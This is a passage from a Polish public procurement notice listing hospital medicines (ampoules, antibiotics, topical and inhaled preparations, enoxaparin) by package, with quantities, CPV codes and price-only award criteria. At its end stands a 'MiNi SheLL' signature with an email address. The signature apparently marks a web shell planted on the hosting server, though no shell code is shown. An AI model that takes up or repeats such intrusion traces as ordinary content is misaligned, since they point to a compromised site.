tabl.powl.	op.	5/75.	Thiamazolum 20 mg x 50 tabl.powl.	op.	2/76.	Thiethylperazine maleate 6,5 mg x 50 tabl.	op.	5/77.	Timonacicum 100 mg x 30 tabl.	op.	60/78.	Torasemide 5 mg x 30 tabl.	op.	30/79.	Torasemide 10 mg x 30 tabl.	op.	30/80.	Tramadol/Paracetamol 37,5mg/325mg x 60 tabl.powl.	op.	50/81.	Tranexamic acid 500 mg x 20 tabl.powl.	op.	20/82.	Trimebutini maleas 100 mg x 100 tabl. powl.	op.	5/83.	Valsartanum 80 mg x 28 tabl.powl.	op.	40/84.	Valsartanum 160 mg x 28 tabl.powl.	op.	40/85.	Verapamilum 120 mg x 40 tabl. o przedł.uwaln.	op.	2/86.	Verapamilum 240 mg x 40 tabl. o przedł.uwaln.	op.	2/87.	Warfarinum natricum 3 mg x 100 tabl.	op.	2/88.	Warfarinum natricum 5 mg x 100 tabl.	op.	2/89.	Zofenopril 7,5 mg x 28 tabl.	op.	15<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33610000-9, 33615000-4, 33616000-1, 33617000-8, 33620000-2, 33621300-2, 33622300-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>-Pakiet nr 4: Ampułki.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	0,3% roztwór KCl z 0,9% NaCl x 10 but.a 500 ml	op.	30/2.	Acidum lipoicum 600 mg x 10 fiol.	op.	5/3.	Albuminy 200mg/1ml a 100ml x 1 fl.	op.	50/4.	Ambroxol 15mg/2ml x 10 amp.	op.	300/5.	Amiodaron 150mg / 3ml, op. 5 amp.	op.	150/6.	Aqua pro iniectione a 10 ml x 100 amp.	op.	30/7.	Ascorbicum acidum 500 mg, op. 10 amp.	op.	150/8.	Calcium Chloratum 670mg/10ml x 10 amp.	op.	200/9.	Cisatracurium 10 mg/5 ml x 5 amp.	op.	10/10.	Clemastine 2 mg/ 5ml x 5 amp.	op.	50/11.	Cyanocobalamin 100µg/2ml x 10 amp.	op.	5/12.	Cyanocobalamin 1000µg/2ml x 5 amp.	op.	20/13.	Deksametazon 4mg/1ml 10 amp.	op.	150/14.	Deksametazon 8mg/2ml 10 amp.	op.	80/15.	Dopamina 4% 200mg/5ml x 10 amp.	op.	15/16.	Drotaweryna 40 mg /2 ml, op. 5 amp.	op.	200/17.	Etamsylatum 250 mg/ 2 ml x 50 amp.	op.	50/18.	Etomidate 20 mg / 10 ml, op. 5 amp.	op.	8/19.	Ferri isomaltosidum 100 mg / 1 ml, op. 5 fiol.	op.	30/20.	Ferri isomaltosidum 500 mg / 5 ml, op. 5 fiol.	op.	5/21.	Furosemid 20mg/2ml x 50 amp.	op.	140/22.	Glucagon 1 mg, op. 1 amp-strzyk	op.	1/23.	Glucosum 20% inj., op 10 amp a 10 ml	op.	3/24.	Glucosum 40% inj., op 10 amp a 10 ml	op.	2/25.	Heparyna 25000j.m./5ml x 10 fiol.	op.	15/26.	Hydrocortyzon 100mg x 5 fiol.	op.	140/27.	Immunoglobuliny ludzkie g	50/28.	Kalii canrenoas 200 mg / 10 ml, op. 10 amp.	op.	15/29.	Kalium Chloratum 15%/20 ml x 10 fiol.	op.	200/30.	Lidokaina 10mg/1ml x 5 fiol.a 20 ml	op.	80/31.	Lidokaina 20mg/1ml x 10 amp.a 2 ml	op.	30/32.	Lidokaina 20mg/1ml x 5 fiol.a 20 ml	op.	80/33.	Magnesium sulfate 200 mg/ml x 10 amp.a 10 ml	op.	120/34.	Mesna 400 mg / 4 ml, op. 15 amp.	op.	2/35.	Metamizol 1,0g/2ml x 5 amp.	op.	300/36.	Metamizol 2,5g/5ml x 5 amp.	op.	200/37.	Methylprednisolone 40 mg, proszek i rozp. do sporz. roztw. do wstrz.x 1 fiol.	op.	2 000/38.	Methylprednisolone 500 mg, proszek i rozp. do sporz. roztw. do wstrz.x 1 fiol.	op.	30/39.	Metoprolol 5 mg / 5 ml, op 5 amp.	op.	10/40.	Mivacurium 20 mg/10 ml x 5 amp.	op.	10/41.	Natrium bicarbonicum 8.4% 84mg/1ml a 20ml x 10 amp.	op.	54/42.	Natrium Chloratum 0,9% x 10ml x 50 amp.	op.	408/43.	Natrium Chloratum 10% x 10 ml x 100 amp.	op.	20/44.	Neostigmine methilsulphate 0,5mg/1 ml x 10 amp.	op.	150/45.	Norepinefryna 1mg/1ml x 10 amp.	op.	70/46.	Norepinefryna 4mg/4ml x 5 amp.	op.	150/47.	Omeprazol 40 mg x 1 fiol.	op.	250/48.	Ornithine aspartate 5 g / 10 ml, op. 10 amp.	op.	3/49.	Pantoprazol 40mg x 10 fiol.	op.	120/50.	Papaweryna 40mg/2ml x 10 amp.	op.	40/51.	Paracetamol 1,0 g/100 ml x 10 fl. Plastik	op.	400/52.	Pentoxifylline 300mg/15ml x 10 amp.	op.	10/53.	Phytomenadione 10mg/1 ml x 5 amp.	op.	20/54.	Propofol 200mg/20ml x 5szt.	op.	1000/55.	Protaminum sulfuricum 1% x 1 amp.	op.	5/56.	Rocuronium 100 mg /10ml x 10fiol.	op.	40/57.	Salbutamol 0,5 mg/ml x 10 amp.	op.	3/58.	Sugammadex 200 mg /2 ml, op 10 amp.	op.	2/59.	Suksametonium 200mg x 10 fiol.	op.	20/60.	Teofilina 200 mg / 10 ml x 5 amp.	op.	40/61.	Tramadol 100mg/2ml x 5 amp.	op.	100/62.	Tranexamic acid 500 mg / 5 ml x 5 amp.	op.	200/63.	Urapidyl 25 mg / 5 ml x 5 amp.	op.	10/64.	Walproinian sodu 400 mg/4 ml x 1 fiol.	op.	30<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33661200-3, 33615000-4, 33616000-1, 33617000-8, 33620000-2, 33621300-2, 33622300-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>-Pakiet nr 5: Antybiotyki.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	Amikacyna 500mg/100ml x 10 fl.	op.	10/2.	Amikacyna 1,0g/100ml x 10 fl.	op.	50/3.	Amoksycylina+Kw.Klawulanowy 1,2 g (1,0 g+0,2 g) x 5 fiol.	op.	400/4.	Amphotericin B 50 mg proszek do sporządzenia wlewów i.v. x 1 fiol.	op.	40/5.	Amphotericin B zawiesina liposomalna do wlewów i.v. 5mg/1ml x 10 fiol.a 20 ml	op.	4/6.	Cefazolin 1,0g x 1 fiol.	op.	500/7.	Ceftaroline fosamil 600 mg x 10 fiol.	op.	1/8.	Ceftazydym 1,0g x 1 fiol.	op.	1000/9.	Ceftazydym 2,0g x 1 fiol.	op.	1500/10.	Ciprofloksacyna 200mg/100ml x 1 fl.	op.	500/11.	Ciprofloksacyna 400mg/200ml x 1 fl.	op.	1440/12.	Colistyna 1 mln j.m. x 20 fiol.	op.	120/13.	Fidaksomycin 200 mg x 20 tabl.powl.	op.	1/14.	Fluconazole 100mg x 14 tabl./kaps.	op.	50/15.	Flukonazol 200mg/100ml x 10 fl.	op.	50/16.	Ganciclovir 500 mg, op. 1 fiol.	op.	50/17.	Imipenrm/Cilastatin 500mg/500mg x 10 fiol.	op.	40/18.	Itrakonazol 100 mg x 28 kaps.	op.	40/19.	Klindamycyna 300mg/2 ml x 5 amp.	op.	200/20.	Klindamycyna 600mg/4 ml x 5 amp.	op.	350/21.	Levofloxacinum 250 mg x 10 tabl.	op.	10/22.	Levofloxacinum 500 mg x 10 tabl.	op.	100/23.	Levofloxacyna 250mg/50ml x 10 fl.	op.	30/24.	Levofloxacyna 500mg/100ml x 10 fl.	op.	200/25.	Linezolid 600mg/300ml x 1 worek	op.	700/26.	Meropenem 500mg x 10 fiol.	op.	50/27.	Meropenem 1000mg x 10 fiol.	op.	500/28.	Metronidazol 250mg x 20 tabl.	op.	40/29.	Metronidazol 500mg /100 ml x 1 fl.	op.	1920/30.	Micafungin 100 mg x 1 fiol.	op.	70/31.	Oseltamivir 75 mg x 10 kaps.	op.	150/32.	Sulfametoksazol/Trimetoprim 480mg(400mg+80mg)/5ml x 10 amp.	op.	120/33.	Teicoplanin proszek i rozp. do sporz. roztw.do wstrz. i/lub inf. 400 mg x 1 fiol.	op.	70/34.	Tigecycline proszek do sporz. roztw. do inf. 50 mg x 10 fiol.	op.	3/35.	Tobramycyna 240mg/80ml x 10 fl.	op.	100/36.	Vancomycin proszek do sporz. roztw. do inf. 500 mg x 1 fiol.	op.	150/37.	Vancomycin proszek do sporz. roztw. do inf. 1000 mg x 1 fiol.	op.	150/38.	Voriconazole 200 mg x 1 fiol.	op.	150/39.	Vorikonazol 200mg x 20 tabl.pow.	op.	30<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33651100-9, 33651200-0, 33651400-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>-Pakiet nr 6: Galena.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	Aciclovir krem 50 mg / 1 g x 5 g	op.	4/2.	Allantoin, Dexpanthenol (20mg+50 mg) /1g x 30 g	op.	60/3.	Aluminium acetotartrate żel 10 mg /1 g x 75 g	op.	60/4.	Aluminium phosphate zaw.doustna 45 mg/g x 250 g	op.	10/5.	Ambroxolum płyn do nebulizacji 15mg/ 2ml x 100ml	op.	60/6.	Amikacin krople do oczu 3mg/ ml x 5 ml	op.	2/7.	Arnica sp. maść 200mg/g x 25 g (pudełko)	op.	15/8.	Bromhexine hydrochloride syrop 4mg/ 5 ml x 120 ml	op.	20/9.	Budesonide, Formoterol fumarate (160mcg +4,5mcg)/ dawka Turbuhaler x 60 dawek	op.	5/10.	Budesonide, Formoterol fumarate (320mcg+9 mcg)/ dawka Turbuhaler x 60 dawek	op.	5/11.	Budezonid 1mg/2ml x 20 amp., płyn do nebulizacji	op.	80/12.	Dihydroxyaluminum sodium carbonate, zawiesina doustna 0,34 g/ 5 ml x 250 ml	op.	15/13.	Dimethicone 980 mg / g, op. but 5 g	op.	10/14.	Ethyl chloride aerozol a 70 g	op.	1/15.	Fenotroli hydrobromidum/ Ipratropii bromidum (0,5mg+0,25mg)/ ml roztwór do nebulizacji x 20 ml	op.	200/16.	Fluticasone furoate aerozol do nosa, zawiesina 27,5mcg/ dawka x 120 dawek	op.	3/17.	Formoterol 12µg/dawka, prosz.do inh.x 60 kaps.	op.	15/18.	Glycerol czopki doodbytnicze 2 g, op. 10 szt.	op.	60/19.	Glyceryl trinitrate aerozol podjęzyk., roztw. 400 mcg / dawka, op. 11 g (200 dawek)	op.	5/20.	Ipratropium bromide 250mcg/ml roztwór do nebulizacji x 20 ml	op.	100/21.	Lactulosum 2,5g/5 ml x 150 ml	op.	120/22.	Lidocaine aerozol na skórę roztwór 10 %, op. but. 38 g	op.	50/23.	Lidokaina 20mg/1g x 30g żel anestezjologiczy	op.	20/24.	Mupirocin maść 20mg / g, op. tuba 15 g	op.	3/25.	Mupirocin maść do nosa 20g/g x 3 g	op.	3/26.	Neomycin sulphate naść do oczu 5 mg / g, op. tuba 3 g	op.	3/27.	Nystatin granulat do sporz zawiesiny doustnej i stos.w j.ust.j 100 000 j.m./ ml x 28 ml op.	120/28.	Paraffinum liquidum x 100 g	op.	20/29.	Povidone iodine maść 100 mg/g x 20 g	op.	70/30.	Povidone-Iodine roztwór na skórę 100mg/ 1ml x 30 ml	op.	100/31.	Povidone-Iodine roztwór na skórę 100mg/ 1ml x 1000 ml	op.	10/32.	Preparat do dezynfekcji jamy ustnej posiadający w swoim składzie: Chamomilla, Quercus, Salvia, Arnica, Acorus, Mentha, Thymus, Benzocaine x 25 g (np.Dentosept A)	op.	5/33.	Roztwór przeznaczony do dekontaminacji, płukania, pędzlowania jamy ustnej na bazie poliheksanidyny; bez zawartości alkoholu x 250 ml	op.	100/34.	Salbutamol roztwór do nebulizacji 2,5 mg/ 2,5 ml x20 amp.	op.	50/35.	Salbutamol+Ipratropium bromek (0,5 mg+2,5 mg)/2,5 ml, op. 20 amp.	op.	150/36.	Sewofluran płyn wziewny x 250 ml	op.	3/37.	Simeticonum 40 mg / 1 ml a 30 ml	op.	10/38.	Sodium dihydrophosphate, Sodium hydrophosphate roztw.doodbytniczy, op but. 150 ml	op.	100/39.	Sodium polystyrene sulfonate 1,42 g Na+/15 g proszek doustny lub do sporz. zaw. Doodbytniczej x 454g	op.	3/40.	Sulfathiazolum argentum 20mg/1g x 40g krem	op.	50/41.	Vaselinum album x 20 g	op.	40/42.	Vitamin F, krem 200 mg/ g x30 g	op.	50/43.	Vitamin F, maść 200 mg/ g x 30 g	op.	50<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33670000-7, 33642200-4, 33631000-2, 33631100-3, 33631400-6, 33631500-7, 33631600-8, 33632100-0, 33641100-6, 33661200-3, 33612000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>-Pakiet nr 7: Enoksaparyna.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	Enoksaparyna 40mg/0,4 ml x 10 ampstrz.	op.	800/2.	Enoksaparyna 60mg/0,6 ml x 10 ampstrz.	op.	150/3.	Enoksaparyna 80mg/0,8 ml x 10 ampstrz.	op.	60/4.	Enoksaparyna 100mg/1,0 ml x 10 ampstrz.	op.	20<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33621100-0, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com